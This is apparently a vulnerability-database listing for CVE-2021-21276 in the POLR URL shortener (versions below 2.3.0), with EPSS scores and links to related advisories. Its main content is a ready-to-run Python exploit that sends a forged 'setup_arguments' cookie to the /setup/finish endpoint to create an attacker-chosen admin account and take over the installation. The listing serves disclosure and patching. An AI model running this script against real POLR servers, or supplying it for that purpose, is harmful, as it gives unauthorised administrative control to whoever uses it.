Lucene search
P4kl0nc4t1337DAY-ID-38511HistoryApr 06, 2023 - 12:00 a.m.
POLR URL 2.3.0 - Shortener Admin Account Takeover Exploit
2023-04-0600:00:00
p4kl0nc4t
0day.today
115
0.015 Low
EPSS
Percentile
87.1%
# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>
# Vendor Homepage: -
# Software Link: https://github.com/cydrobolt/polr
# Version: < 2.3.0
# Tested on: Linux
# CVE : CVE-2021-21276
import json
import requests
payload = {
'acct_username': 'admin',
'acct_password': 'password',
'acct_email': '[emailΒ protected]',
'setup_auth_key': True,
}
r = requests.get('http://localhost/setup/finish',
cookies={'setup_arguments': json.dumps(payload)})
print(r.text)
Related
cvelist
cvelist
CVE-2021-21276 Privilege escalation in Polr
2021-02-01 00:00:00
packetstorm
packetstorm
POLR URL 2.3.0 Shortener Admin Takeover
2023-04-06 00:00:00
cve
cve
CVE-2021-21276
2021-02-01 15:15:13
osv
osv
CVE-2021-21276
2021-02-01 15:15:13
nvd
nvd
CVE-2021-21276
2021-02-01 15:15:13
prion
prion
Code injection
2021-02-01 15:15:00
exploitdb
exploitdb
POLR URL 2.3.0 - Shortener Admin Takeover
2023-04-06 00:00:00